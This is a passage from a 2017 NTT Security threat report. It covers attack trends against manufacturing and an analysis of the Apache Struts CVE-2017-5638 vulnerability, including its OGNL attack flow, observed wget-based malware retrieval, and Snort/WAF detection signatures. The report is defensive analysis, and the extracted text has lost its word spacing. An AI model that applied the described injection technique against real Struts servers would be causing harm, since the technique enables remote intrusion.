Apache Struts, ShellShock and WannaCryThereisareasonwhyattackersfromeachofthetopcountriesconsistentlytargetthesevulnerabilities.EachcanbeusedtogainaccessorremotelycontrolWindowsandLinux-basedsystems.TheexceptionisWannaCrywhichutilizedtheEternalBlueexploit,andspecificallytargetsWindowssystems.Thesuccessofexploitingthesevulnerabilitiesisdependentonthepremisethatmanyvendorsandadministratorshavenotpatched,updatedsystemsortakenadditionalprecautions.Untilindustryimprovestheconsistencyandregularitywithwhichtheyupdatesystems,suchattackswillcontinue.NTTSecurityanalystsobservedtheCVEsassociatedwiththesenowinfamousnamestrendingacrossfifteenindustries.Theheaviestconcentrationofthisactivitywasinthemanufacturingandfinanceindustries.
Financialinstitutionscanlosemillionsofdollarsasaresultofmoneystolenfromaccounts,ormoneypaidforransomware.Manufacturingcanlosejustasmuchfromtheftofproductideas,andintellectualpropertysoldtocompetitors.Alltheindustriesonthelisthavevaluableinformationtoprotect.
Adobe Product EventPercentage CVE Total
Flash Player
Adobe AIR
Acrobat Reader
98.40%
1.30%
0.10%
14
2
Air SDK 0.10% 1
5
Acrobat 0.10% 4
Figure 16. Industries targeted via the top 10 CVEs.
Copyright 2017 NTT Security 14
GlobalThreatVisibility/Observations
Global Threat Visibility: Final ThoughtsNTTSecurityanalystsobservedasmalloverallincreaseindetectionsinQ2’17.Thefirsthalfof2017includedaheavyfocusonmanufacturingandthedistributionofmalwarethroughlargephishingcampaigns.WebapplicationsbasedonPHPcontinuetobeapopulartargetbyhackerswhounderstandthelackofsecurityimplementationsintopluginsandapplications.Asbrute-forcingcontinuestobepopular,NTTSecurityanalyzedseveralbrute-forcingattemptsagainstpublicMSSQLserverswithdefaultportsandout-of-dateversions.ThisshouldbeanimportantremindertonotallowRDBMSanddatabasestobepublic-facing,asattackersfocusmoreonthemonetizationofransom-styleattacks.AsAdobeFlashPlayerremainstoberiddledwithRCEvulnerabilitiesbeingtargetedbycybercriminals,itiscrucialtounderstanddrive-byandweb-basedattackscontinuetobeprevalent;targetingnotonlyunpatchedservers,butcommonwebvisitorsintheorganization,includingtheorganization’semployeesandclients.WithrecentattacksinvolvingaPetyavariant,WannaCry,Trickbotandothers,NTTSecuritypredictscybercriminalswillcontinuetosupporttheireffortswithphishingcampaignsthroughout2017todeliverevermorerobustmalware.Afteranalyzingattacksfromhostsinseveralcountries,itisevidentcompromisedhostsincountrieswhichtypicallyflyundertheradar–suchastheNetherlands–arecomingbackintothespotlight.NTTSecurityexpectsthistrendtocontinueasthesecountriesbuildtheirinfrastructure,whichcouldbecomecompromisedandleveragedinfuturecyberattacks.
NTTSecurityrecommendsthefollowingtohelpmitigatethethreatsdiscussedabove:
• Conductregularvulnerabilityscansandpenetrationtestingto identifyvulnerabilities.
• Alwaystakeadefense-in-depth(DiD)approachtosecurity controls,includingdefininginternalsegmentation andsegregation,whichincreasesthecomplexityfor cybercriminalstobecomemoresuccessfulduringattacks.
• EstablishanIncidentResponseTeamsupportedbyformal anddocumentedprocessesandprocedures.
• Enforceeffectivepatchmanagementthroughbothautomated andmanualprocessestoensurenecessarysoftware andhardwarepatchesareapplied,mitigatingsuccessful exploitationattempts.
• Considerwhitelistingapprovedapplications.
• Ensurecriticaldata,information,operatingsystems, applications,tools,andconfigurationfilesarebackedupand storedoffline.Processesandprocedurestoreverttobackups duringanincidentshouldbedocumentedandtestedona routine basis .
Copyright 2017 NTT Security 15
threatsindustriesacrosstheglobefacedaily,particularlythreatstothemanufacturingindustry,whicharebecomingprogressivelymoredifficulttodefendagainst,astechnologyandconnectivitycontinuetoincreaseatanastoundingrate.
Theindustryitselfcoversanincrediblybroadrangeoforganizations:fabricsandtextiles,foodproducts,constructionmaterials,pharmaceuticals,plastics,metals,computercomponents,automobiles,justtonameafew.Thereasonsforanygivensegmenttobetargetedareinnumerable–fromintellectualproperty(IP)thefttoespionagetousingafirmasasteppingstoneforfurthertargeting(forinstance,ifatargetedmanufacturingfirmisinthesupplychainofanotherfirmorgovernmentorganization).
Whatotherfactorsmakethemanufacturingindustrymoresusceptibletobeingtargetedbyhackers,cybercriminalsandotherthreatactors?Istheindustryfundamentallymorevulnerable?
What Makes Manufacturing an Attractive Target?RebeccaTaylor,SeniorVicePresidentforNCMS,says,“Mostmanufacturingsystemstodayweremadetobeproductive– theywerenotmadetobesecure.Everymanufacturerisatrisk– itisn’tamatterofiftheywillbetargeted,it’samatterofwhen.”
Intellectualpropertyisatapremium,andinamarketwherefractionsofmarketsharescanmeanmillions–orbillions–ofdollars,competitionisfierce.Industrialcontrolsystems(ICS)areoftenleftunguarded,andworseyet,theyareoftenbuiltwithlittletonothoughtforsecurity,sometimesmakingprotectionofthedeviceitselfimpractical.Thereisalackofinvestmentincybersecurity,asfundsarebeingspentupgradingsystemstobemoreproductiveormoreefficient.Infact,almosthalfoftop
AttackProfileoftheManufacturingIndustry
Thecostofcybercrimetobusinessesisexpectedtoreach $6trillionannuallyby20217.Globally,themanufacturingindustryisnowoneofthemostfrequentlyattackedindustries,secondonlytohealthcare,makingpotentiallossesinthisindustrycatastrophic.
Themanufacturingindustryisincreasinglybeingtargeted,asthreatactorsperceivetheprospectivegainsinattackingnetworksinthisindustry.PertheNationalCenterforManufacturingSciences(NCMS),33percentofallcyberattacksin2015wereagainstthemanufacturingsector.In2016,39percentofmanufacturingfirmssaidthey’dbeenbreached,withbreachescostingbetween$1-10million.Thistrendwillcertainlycontinue.
TargetingofthemanufacturingindustrywasalsoseeninNTTSecurityclientdataoverthelastyear.ThemostrecentNTTSecurity Global Threat Intelligence Report (GTIR)8showedthemanufacturingindustrywasheavilytargetedacrossclientnetworksduring2016,appearinginthetopthreetargetedindustriesinfiveofthesixgeographicregionsevaluated.Nootherindustryappearedinthetopthreemorethantwice.ManufacturingwasthemostattackedsectorinAfricaandtheAmericas,andthesecondmostattackedsectorinAsia(32percent,trailingonlyfinance),sogeographicareaswithsignificantmanufacturingcapabilitiesareseeingtheimpactofthisfocus.
Thistrendcontinuesinto2017.Infact,themanufacturingindustrywasthemostheavilytargetedindustryacrossNTTSecurityclientsduringQ2’17.
Globalestimates,acrossallindustries,oflossesinthetrillionsofdollarsoverthenextfiveyearsarenotsurprisinggiventhe
“Mostmanufacturingsystemstodayweremadetobeproductive—theywerenotmadetobesecure.Everymanufacturerisatrisk—itisn’tamatterofiftheywillbetargeted,it’samatterofwhen.”Rebecca Taylor, Senior Vice President for NCMS
7 http://cybersecurityventures.com/cybersecurity-market-report/8 https://www.nttsecurity.com/en/what-we-think/gtir-2017/
Copyright 2017 NTT Security 16
AttackProfileoftheManufacturingIndustry
executivesinmanufacturingfirmsneitherfeelconfidentintheirtechnologytoprotecttheirnetworks,nordotheyfeeltheyhaveadequatefunding.
And,connectivityisincreasing.FromInternetofThings(IoT)andOperationalTechnology(OT)devicestoroboticstohuman-machineinterfacing(HMI),thisconnectivityisimprovingautomation,and,subsequently,cuttingcostsandincreasingproductivity.Unfortunately,thisincreasestheattacksurface.Manyindustriesincorrectlybelieve“itcan’thappentous.Wedon’thavevastamountsofconsumerdata,healthrecords,orcreditcardinformation.Wejustmake‘widgets.’”
Whiletheabovelineofthoughtmaybethefirstinclination,rememberthat,yearafteryear,themanufacturingindustry hasconsistentlybeenoneofthetopmostfrequently targetedindustries.
Considertheconsequencesofabreach:fewer‘widgets’tosell,competitorsgaininginsightintoyourwidgetproductionprocessesorproprietarywidgetinnovations,cybercriminalsdemandingaransomtodecryptthissameinformationorforeignnationsusingthissameinformationtoundercutamajorbid.Thiscouldtranslateintodecreasedproductivity,increasednetworkdowntime,and,ultimately,adecreaseinprofits.Howmuchdecreasein“X”canyourorganizationafford?
Thereisnoquestionthatcybercriminalsarelookingtocapitalizeonthishighlyattackableindustry.Othersmaywanttodamageafirm’sbrandandreputation,perhapstobenefittheirown.
Butcybercriminalsandcompetitorsaren’taloneintargetingthoseinthisindustry,asnation-stateactorsaredoingthesame.
PerChina’snewestFiveYearPlan(FYP),theChinesegovernmentcontinuestoprioritizesignificanteffortswithinthemanufacturingsectorthrough2020.InearlyDecember2016,ChinareleaseditsnewestFYPforintelligentmanufacturinginattemptstoincreaseitscompetitivenessinthe“factoryoftheworld,”along-termstrategytogeneratenewgrowthinthecountry’smanufacturingsector.
Additionally,“MadeinChina2025”targetstenkeysegmentsoftheindustryforadditionalgovernmentsupport:
• Newenergyvehicles
• Next-generationinformationtechnology(IT)
• Biotechnology
• Newmaterials
• Aerospace
• Oceanengineeringandhigh-techships
• Railway
• Robotics
• Powerequipment
• Agriculturalmachinery
ChinesecyberactorshaveattackedindustrieslistedintheFYPinthepast,primarilytoaccrueIPandotherdata.Thosesegmentsidentifiedasprioritiesforresearchanddevelopmentcanexpectcontinuedinterestfromtheseactors.BasedonexperiencewithattacksfromChinaoverthepastseveralyears,NTTSecurityexpectsthesetypesofattackstocontinueinallindustries,butparticularlyinmanufacturing.
Trends – and Associated Emerging Risks – in the Manufacturing Industry
Inthisrapidlychangingindustry,atoppriorityiscuttingoperationalcosts,whilemanufacturersleveragetechnologytoensurefuturegrowth.
Manufacturingorganizationshavetakenonamuchmorewidely-distributedenvironmentandinfrastructure.Increasingnumbersofusersanddeviceswillgreatlyincreasethenumberofavenuesintoyournetworkfromthreatactors–fromcybercriminalstonation-stateactors.
…yearafteryear,themanufacturing
industryhasconsistently been oneofthetop mostfrequently
targetedindustries.
9 http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats10 https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_
Copyright 2017 NTT Security 17
AttackProfileoftheManufacturingIndustry
Theindustryhasbecomemorevulnerableduetoitsfocusontechnologicaladvances,whilenotinvestingasheavilyinthecybersecuritybudgetasinotherpriorities.Thisisnottosaythattheindustryisignoringsecurity,ratherthattheinvestmentintechnologyandenablingserviceshastakenapriority.Asaresult,cybersecuritymayhavetakenabackseat.Thisholdstruenotonlyinthemanufacturingindustry,butinmanysectors.Infact,theCyberSecurityBreachesSurvey201710,publishedearlierthisyearsuggestsmanufacturersarelesslikelythanmanyotherindustriestoratecybersecurityasaseriouspriority.Just31percentoffirmsinthemanufacturingindustryregardedcybersecurity as a high priority . In contrast, 61 percent in the financialsectorheldcybersecurityasahighpriority,alongwith49percentinboththehealthcareandeducationsectors.Tosomeextent,thisisunderstandable.Anyonecanlookatthedataandthinkthat“personalhealthcareinformation”and“cardholderdata”aremoresensitivethan“widgets,”right?
Operational Technology and “Smart Factories” Perhapsthemostinfluentialofalltrendsresultsinoneofthegreatestemergingcyberthreatstothemanufacturingindustry:smartfactories.Hopingtoaddefficiency,productivity,qualityofproductsandflexibilitytotheprocess,connected–or“smart”–factoriesareexpectedtoadd$500billiontotheglobaleconomyinthenextfiveyears,addingyetanotheravenueforthreatactorstotargetthemanufacturingindustry.
Thisconnectivityisexpectedtodrivea27percentincreaseinefficiencyduringthattimeframe,andbytheendof2022,manufacturersexpectthat21percent11ofallfactorieswillbefullyconnected.Butalltheseadditionaltools,devices,androbotsareredefiningtheattacksurfaceinthemanufacturingindustry.Despitethebenefitsofconnecteddevices,thiscreatesanenvironmentwithacontinuallybroadeningattacklandscapeduetoendpointexpansion.Asthesedevicesmultiply,theycanbecomecrucialaccesspointsforanattackertoinfiltrateanetwork,orbecomepawnsinabotnetorevenbevictimsofransomwarethemselves.Simplyput,themoresystemsyouhave,themorelikelyitisthatanattackerisgoingtofindsomething“interesting”inyourenvironment.12
TheriseoftheOTalsoplaysacriticalroleinintegratingmanufacturingprocesses,improvingproductivityandefficiency,solongasthesetechnologiesareproperlysecured.Integrationeffortsvarywidelybyindustrysegment.Forexample,67percentofindustrialmanufacturingand62percentofaerospaceanddefenseorganizationshavebeguntoimplementsmart
factoryinitiatives,whileonly37percentofpharmaceuticalmanufacturersareleveragingdigitaltechnologies.
Industry 4.0: Automation, Connectivity and ServitizationManufacturersareamidoneofthemostexcitingtechnologicalchangesinhistory,knownasthefourthindustrialrevolution,orIndustry4.0.Thecapabilities–andchallenges–representedbyconnectivityviaIoTandOT,roboticsandautomationoffermanufacturerstheopportunitytooperatemoreefficientlyandeffectively,developingnewbusinessprocesses,suchasservitization,(essentially,theevolutionofanorganization'scapabilitiestobettercreatemutualvaluethroughashiftfromsellingproducttosellingProduct-ServiceSystems),alltakingcustomerservicetoanewlevel.
AlthoughsomeU.S.manufacturersaremovingmoreslowlyinadoptingIndustry4.0,75percent13ofrespondentsina2017reportfeeltheyhavesufficientunderstandingoftheissuesandimplicationsofIndustry4.0anditsthreatsandopportunities.Inaddition,asignificantproportionofrespondentswereeitherbeginningtomovetoIndustry4.0(23%),orwereplanningtodoso(62%).About66percenthadmadefurtherinvestmentsinautomationinthepast12months,andmosthadacknowledgedanunderstandingofservitization.
New Technologies and Reuse of Old SoftwareAsinmanyindustries,andasnotedearlier,manufacturinghashistoricallybeengearedtowardmeetingitsbusinessobjectivesratherthanaquestforgreatersecurity.Anothersymptomofthismentalityisthatoldsoftwareisreused(efficiency!),potentiallypropagatingexistingsecurityholes.
21%ofmanufacturershavesufferedalossofintellectualpropertyfromcyberattacks.
11 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag2312 http://enterpriseiotinsights.com/20170601/smart-factory/20170601smart-factorysmart-factories-economic-value-tag2313 http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf
Copyright 2017 NTT Security 18
AttackProfileoftheManufacturingIndustry
Inaddition,organizationsareemployingnewtechnologies,potentiallyexposingfirmstorisksforwhichtheymaynotyethavefullyconsideredtheimpactontheirsecurityposture.Forexample,softwaremaybebuiltusingopen-sourcecodealreadyinexistenceonsharedsites,possiblyincludingsomequestionablesources,potentiallyputtinganorganizationindangerifthesehostsaren’tsegmentedfromtherestofthenetwork.Whilemostofthissharedcodeissafe,notallofitis.Withhardcodedbackdoorswrittenintosoftware,vulnerabilityproof-of-conceptsininsecuresoftwarecode,andmoreavailableonline, theriskthatanattackerwillusethistohisadvantageincreases.
Asmentionedatthebeginningofthissection,newtechnologiesareincreasingtheattacksurface,andproperlysecuringthesetechnologiesisessentialtoreducingtherisktoyourorganization.
Cyber Espionage and Theft of IPTwenty-onepercentofmanufacturershavesufferedalossofintellectualpropertyfromcyberattacks.
Inits2016ManufacturingReport,Sikich14citedIPtheftastheprimarymotivebehindanattackonamanufacturingorganization.Tofurtherdrivethepointhome,theFBIestimatesthatIPworth$400billionisstolenfromU.Sfirmsalone,eachyear.
Cyberespionageisnowconsideredtobethemostcommontypeofattackinthisindustry.Alargepartofthisisduetotheexplosionofproprietarydataandresearch.
Thesetypesofattackscantakemanyforms.Mostcommonly,though,attacksareattributedtocompetitorstryingtoobtainIP,whetherthatIPbeproprietarymanufacturingprocesses,patentsordesigns.Sadly,manyinternationalcompetitorsarenothighlyethical,viewingcyberespionageasanothermeanstoreachtheirownobjectives.
Nation-stateactorsareheavilyimmersedincyberespionageactivities,withChinadominatingthecyberespionagespaceoverthepasttwodecades.Despitethecybertreatysignedin2015betweentheU.S.andChina,thethreatneverthelesscontinues,particularlyinthemanufacturingindustry.
Cyberespionageisrampantandisnotconnectedonlytonation-stateactors.Inthisglobaleconomy,goodscanbeproducedvirtuallyanywhere.Ifacompetitorcanstealtheresearchanddevelopmentbehindthosegoods,thenanunethicalcompany,nationorcybercriminalwillbeabletoundercutandwinonprice.Itonlycoststheunsecuredmanufacturingfirm,anditscustomers,money.
Theseattacksby“cyber-spies,”andanysubsequentbreaches,particularlythosebackedbynation-states,werebehindasignificantnumberofbreachesexperiencedbymanufacturingfirmslastyear.Theseattacksaretypicallyhighlytargetedandwellthoughtout,targetingspecificdata.Over90percentofthematerialstolenhadbeencategorizedas“secret”or“proprietary,”indicatingthattheattackerssuccessfullybypassedsecuritycontrolscurrentlyinplace,orsimplythatthisisthetypeofdatathreatactorsareseeking.Thatsaid,manystate-backedthreatactorshaveaccesstozero-daysorothersophisticatedtools.Tocombatthesethreats,manufacturersneedtoensuretheyhave,attheveryleast,bestpracticesemployed.Pleasenotethatthesesecurityshortfallsarenotspecificonlytothisindustry,butseemtohappenonamuchbroader,globalscale.
Despitetheseemergingthreats,the2017CybersecurityBreachesSurveysuggeststhatmanufacturersarefarlesslikelythanmanyothersectorsoftheeconomytoratecybersecurityasaseriouspriorityfortheirorganizations;itmaybeworthrestatingthatjust31percentofmanufacturersregardedcybersecurityasahighpriority.Hopefullythistrendwillreverseitself,astheindustryfaceshugechangesinthecomingyears,requiringtheutmostinnetworksecurityifmanufacturingorganizationswishtoremaincompetitive.
RecommendationsAparadigmshiftinmindsetisessentialinallsegmentsofthemanufacturingindustryandinallpartsoftheprocess.Tosuccessfullyfacecurrentandfuturethreats,cybersecuritymustbebuiltintoallaspectsofanorganization’snetworksandoperationsratherthanretrofittedasanafterthought,particularlyasIndustry4.0isimplemented.Itshouldbeclearthatwithoutthepropermitigationeffortsinplace,allprocessesareatrisk,impactingthebottomline.
ormoreofmaterialstolenby “cyber-spies”hasbeenclassified as “secret” or “proprietary .”
90%
14 https://www.leadingedgealliance.com/thought_leadership/sikich_manufacturing_report_2016r.pdf
Copyright 2017 NTT Security 19
AttackProfileoftheManufacturingIndustry
Anorganizationgreatlydecreasesthetimeittakestobouncebackfromanattackiftheparadigmshifthasalreadyoccurred.Giventhecurrentstateofcybersecurityinthemanufacturingindustry,wheredefendersareclearlyatadisadvantage,attacksmaybeallbutinevitable.Witharenewedmindset,organizationsinthemanufacturingsectorcanbecomebetterequippedandmorepreparedtoreactto,andrecoverfrom,anattack.Thisistrueforanyorganization,notjustthoseinthemanufacturingindustry.
Threatactorsandcybercriminalswillcontinuetotargetvictimsintwoareas:organizationswithhighlyvaluabledata,andorganizationswithpoorsecuritypractices.Themanufacturingindustryisoneofthoseindustrieswhichhashistoricallyfallenintobothcategories.Likeanyorganization,manufacturingorganizationscantakeactionsonnetwork/program/software/platformlevelstooptimizesecurityandreduceyourriskofdatacompromise.Iftheserecommendationscanbesuccessfullyimplemented,theenvironmentcanbemademoresecureinapractical,efficientmanner.
NTTSecurityrecommendsmanufacturingorganizationsconsiderthefollowingpreventativeandmitigationstrategies:
• Educateusersonidentifyingandavoidingphishingemails– particularlysinceemployeesarethemostoftentargeted,and maybethefirst–oronly–lineofdefense.
• Ensurecomputers,networkandotherinternet-connected devices,particularlyindustrialcontrolsystems,arerunning themostcurrentversionsofoperatingsystemsandsoftware. Pleasenotethatthemostcurrentsoftwareversionsare typicallythemostsecure,butthisisnotalwaysthecase.
• Inadditiontooutsideactors,don’tforgettosecureagainstthe rogueinsider–someonetrustedwithinyourorganization, whoperhapshas“thekeystothekingdom.”
• Enforce“leastprivilege”–varythelevelofindividualaccess, grantedbasedonspecificuserneedsandscenarios.
• Toeverypracticalextent,isolatesensitivesystemsand networkfunctions.Groupassociatedsensitivefunctionsonto protectednetworkswheneverpossible,toincludesegmenting ICSfromothernetworkfunctions.
• Industrialnetworksareoftennotwellsegmentedbetween IT/OT,soaninfectionintheformercaneasilyspreadto the latter .
• LetmalwaresuchasWannaCryserveasarecentlesson: althoughthemanufacturingindustryseemedalmostimmune
toWannaCry,manyWindowsmachinesinsideICS environmentsarenotfullypatched,andareoftenrunning outdated,unsupportedversions.
Threats to Manufacturing: Final ThoughtsThemanufacturingindustrywillcontinuetomaturethroughautomation,servitizationandIndustry4.0.NTTSecurityfullyexpectsattacksinthemanufacturingindustrytocontinue.Astheimplementationoftechnologyincreasesandattackingbecomesmoreprofitable,cybercriminalsatalllevelswillcontinuetoviewtheindustryasincrediblylucrative,vulnerable,andattackable.Securingallfacetsofyourorganizationisessential.Justoneopeningcreatesanopportunityforthreatactorstogain,andmaintain,afootholdinyournetwork.
ExpectIoT,OTandautomateddevicestocontinueplayinganincreasingroleasmanufacturingorganizationsconsiderhowtohardentheirsecurityinfrastructuretosupportIndustry4.0implementationefforts.Manufacturingorganizationsmustmaximizetheeffectivenessofsecuritycontrolstoprotectthesetechnologiesastheyareimplemented.
Asthenumberofendpointdevicesincreases,theattacksurfacewillalsoincrease,puttingfurtherstrainsonalreadyburdenednetworkinfrastructure.Thiswillleavemanymanufacturingfirmsstrivingtofindwaystosimplifyandstreamlinecybersecuritycontrols.
Analystsanticipateseeingablendingofattackvectors,asthecapabilityandmotivationofthreatactorsincreaseandadapttotheever-changinglandscape.
Thisallmeansthatsomehow,manufacturingorganizationsneedtoforcethemselvestoprioritizesecurityaspartoftheirevolution.Attackershaveidentifiedmanufacturingfirmsasvaluabletargets,soitbecomesincumbentontheindustrytomakethemselveslessattractivetargets.
References:http://www.eweek.com/security/deloitte-survey-finds-manufacturers-highly-vulnerable-to-cyber-threats
http://www.themanufacturer.com/reports-whitepapers/annual-manufacturing-report-2017/
http://www.nass.org.uk/Publications/Publication4261/Annual-Manufacturing-Report-2017.pdf
Copyright 2017 NTT Security 20
1
1 Jakarta Multipart Request
if the messageincludes OGNL
expression
Struts Basic flows for both filters Jakarta and Jakarta Stream are similar (orange arrows)
2
3
Blue arrows:Flow of S2-045
White arrow:Flow of S2-046
ognl
2
3
Commons FileUpload
processUpload
buildErrorMessage
StrutsPrepareAndExecuteFilter
MultiPartRequestWrapper
LocalizedTextUtil
parse
ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts
IntroductionPetya,WannaCryandtheSMBvulnerabilitiesassociatedwithMS17-010dominatedmuchofthenewsoverthelasthalfofQ2‘17,butwerebynomeanstheonlythreatsorganizationsfaced.NTTSecurityGTICandNTTComputerEmergencyResponseTeam(CERT)collaboratedforacloserlookatoneofthosethreats,attacksseekingtoexploitvulnerabilitiesinApacheStruts.
TherewassomebuzzaroundApacheStruts(CVE-2017-5638)afterApachereleaseditssecurityadvisories(S2-045andS2-046)inMarch2017.Atthetimeofrelease,thevulnerabilities,whichcouldallowremotecodeexecution(RCE),wereassignedaCVSSof10,themostcritical.
ThebiggernewsaboutStrutsisthatattackersquicklyjumpedontheStrutsbandwagon,andhaveremainedthere.ApacheStrutsexploitattemptsquicklyjumpedintothetopfiveattacksmostcommonlydetectedinclientenvironments,andhaveremainedinthetopseventhroughJune2017.
Figure 18. Struts attack vector flow
So,nooneshouldreallybesurprisedthatattackersaretakingadvantageoftheStrutsvulnerabilities–buthowbadare they really?
What is a Struts Attack?TheRCEvulnerabilitiesarebasedonStruts’useofObjectGraphNavigationLanguage(OGNL)asatemplatelanguage.AttackersexploitbothS2-045andS2-046bycraftingamalformedHTTPrequest,alongwithanOGNLpayload,whichforcesStrutstocreateanexception.OGNLincludessecurityrestrictionsoncreatingandaccessinganobject,soattacksmustbypassthoselimitations.
AttackvectorsforS2-045andS2-046aredifferent,soerrorsoccurindifferentphasesofaprocess.
• S2-045:HTTPContentTypeheaderfield
• S2-046:HTTPContentDispositionheaderfieldand Content-Lengthfield
Theprocessflowrelatedtoeachattackvectorisshownin Figure 18 .
Copyright 2017 NTT Security 21
ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts
Struts Attacks TimelinesNTTSecurityresearchersandNTT-CERTbothtrackedtheStrutsannouncementandattacksonaglobalscale.ThetimelineinFigure 19summarizesactivityoverthefirstseveraldays. Attackerstendtoexploitpublicvulnerabilitiesquickly,takingadvantageofexploitsbeforesecurityprofessionalscanfullyevaluatethevulnerabilitiesandbeforepatchescanbeapplied.ThespeedwithwhichApacheStrutsattacks(andothers)wereweaponizedhelpshighlighttheimportanceofeffectivevulnerabilitymanagement.Organizationsmustbeabletoidentify,classify,remediate,mitigateandtrackvulnerabilitiesintheirenvironmentstominimizetheimpactnewvulnerabilitiescanhave,andtoreactinaneffectivemanner.
NTTSecurityandNTTGroupresourcesbeganinvestigatingApacheStrutswithinhoursofthereleaseofApache’ssecurityadvisory.Aresearcherreleasedproof-of-concept(PoC)codetoexploit
Figure 19. Struts timeline
ApachereleasesS2-045
ApachereleasesPatchInvestigation at Apache
March 7 March 8 March 9 March 10 March 11
Investigation at NTT-CERT
Investigation at JPCERT
Investigation at NTT Security
POC CodeReleased
AdditionalMitigationDefined
WAF andSnortSignatureRelease
Applied WAF Signatures and Mitigation in NTT Group Applied patch in NTT Group
Monitoring Enabled by NTT Security
Attacks Detected by NTT Security
thevulnerabilityonMarch8andwebapplicationfirewall(WAF)signaturesweredevelopedsoonafter.NTTSecuritydetectedwhatappearedtobemaliciousattackactivitywithin24hoursofthereleaseofthePoCcode.NTTSecurityandNTT-CERTanalystsevaluatedtheeffectivenessoftheApachepatch,aswellasWAFsignaturesinmitigatingtheimpactoftheobservedattacks.
Inthisprocess,thegoalofNTT-CERT’sanalysiswastoprovidecurrentinformationforinternalNTTGroupresources,includingNTTSecurityandsupportingoperatingcompanies.ThegoalofNTTSecurityanalysiswastoprovidecurrentinformationforNTTSecurityoperationsandclients. EarlyonMarch9,NTTSecuritywasalreadydetectingsignificantlevelsofexploitattempts.AsshowninFigure 20, NTT Security detectedconsistentlevelsofattacksforseveraldaysbeforethesharpincreaseinattacktrafficonMarch17,whichisalmostcompletelyattributabletoactivityfromChina-basedsources.
Copyright 2017 NTT Security 22
Targeted Industries
Education Technology Finance Health Care Government Retail BusinessServices
Entertainment Energy Media
0%
10%
20%
30%
40%
50%
U.S. Japan
Day of Date (March 2017)
3/9
3/10
3/11
3/12
3/13
3/14
3/15
3/16
3/17
3/18
-27%
-46%
14%
42%
44% 11
% 11%
102%
500
1000
1500
2000
2500 CVE-2017-5638 Changes in Attack Volume
ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts
Figure 20. Struts attack log counts
Whileattacksoriginatedfrommanycountriesaroundtheworld,76percentofallattackstargetingApacheStrutsoriginatedfromIPaddressesinChina.
Observed AttacksSixty-ninepercentofattacksfromChinaattemptedtodisablelocalfirewallsandinstallmalwarefromremoteserversusingLinuxretrievalcommandssuchaswget.ThisoftenincludedattemptstopulldownLinux32-bitand64-bitmalwareoverPOPport110.MalwarenamesrangedfromUpTip60throughUpTip97.ThismalwarewasmostoftenhostedintheUnitedStates,ChinaorSouthKorea.
Insomeinstances,wgetwasusedbutdidnotpulldownanymaliciousbinary.Thesewerelikelyattemptstoidentifyvulnerableservers,potentiallytoretrieveadditionalbinariesforfutureattacks.
Struts TargetsResearchersspecificallyevaluateddetectionsinJapanandU.S.operations.Therewaslittleoverlapintheindustriestargetedineachregion.IntheU.S.,65percentofallStrutsdetectionswereidentifiedintheeducationandhealthcareindustries,whileinJapan,46percentofallStrutsattackswerereportedinthegovernmentsectoralone.DetectionsineachindustryinthedifferentgeographiesareshowninFigure 21 . Thefactthatattackerscontinuetotargetdifferentindustriesindifferentgeographicregionsshouldnotsurpriseanyone.While
Figure 21. Targeted industries in U.S. and Japan
Copyright 2017 NTT Security 23
Signature ID
SERVER-APACHE Apache Struts remote code execution attempt41819
41818 SERVER-APACHE Apache Struts remote code execution attempt
SERVER-APACHE Apache Struts remote code execution attempt41923
2024038 ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M22024044
2024045 ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3
Description
headercontent:"_memberAccess"; nocase; re2:"/\b_memberAccess\b/Hi";headercontent:"OgnlContext"; nocase;valuecontent:"OgnlContext"; nocase;headercontent:"MemberAccess"; nocase;valuecontent:"MemberAccess"; nocase;
Signature pattern: part="_memberAccess", rgxp="\b_memberAccess\b"Protocol(s): http,httpsField(s) for search: header
Signature pattern: part="OgnlContext"Protocol(s): http,httpsField(s) for search: header
Signature pattern: part="OgnlContext"Protocol(s): http,httpsField(s) for search: parameterSignature pattern: part="MemberAccess"Protocol(s): http,httpsField(s) for search: header, parameter
thebasicsofanApacheStrutsattackaresimilaracross allgeographies,themotivationsofattackerschange,asdothetargetswhichattackersineachregionfindinteresting.
Why Target Struts?Globally,Strutsseemsanunlikelytarget.ApacheStrutshasrelativelylowglobalmarketadoptionwhencomparedtoothercommonwebframeworks.Figure 2215showstherelativemarketshareofseveralwebframeworks. However,marketsharechangeswhenregionalimpactisconsidered.A2013surveycompletedinJapan16showedthatStrutshada17percentmarketshareinJapan,whichmayhavehelpedcontributetoelevatedlevelsofattacksin somemarkets.
NTTSecurityanticipatescybercriminalswillcontinuetargetingApacheStrutsinstallationsbecauseofthewideinstallationbase,thesimplicityoftheattack,andthefactthattheattackincludestheabilitytoexecutecoderemotely.
ApacheCVE-2017-5638StrutsitsStuff:A Quick Look into Apache Struts
Market Share of Common Web Frameworks
% of Respondents
Web
Fra
mew
ork
0 10 20 30 40 50
Spring MVC
Spring Boot
JSF
We don't
Vaadin
Other
GWT
Play 2
Grails
Struts 2
Struts 1
Wicket
Dropwizard
Play 1
43%
29%
17%
29%
1%
5%
19%19%
17%
6%
13%
13%
4%
4%
3%
3%
3%
Figure 23. Snort Signatures.
Figure 25. Imperva SecureSphere.
Figure 24. F5 BIG IP.
Figure 22. Market share of common web frameworks
15 https://zeroturnaround.com/rebellabs/java-tools-and-technologies-landscape-2016/16 http://www.sbbit.jp/article/cont1/26911 (Please note that this article is only available in Japanese.)
Copyright 2017 NTT Security 24
Apache Struts MitigationCriminalscontinuetotargetApacheStrutsinstallations.Tohelpmitigatetheseattacks,organizationsshouldconsiderthefollowingactions:
• UpgradetoStrutsversions2.3.32orStruts2.5.10.1(orlater).
• ImplementaservletfilterwhichwillvalidateContent-Type andthrowawayrequestswithsuspiciousvaluesnotmatching multipart/form-data.
• Changetoadifferentmultipartparsersuchaspellorthe parserfromtheCommons-FileUploadLibrary17 .
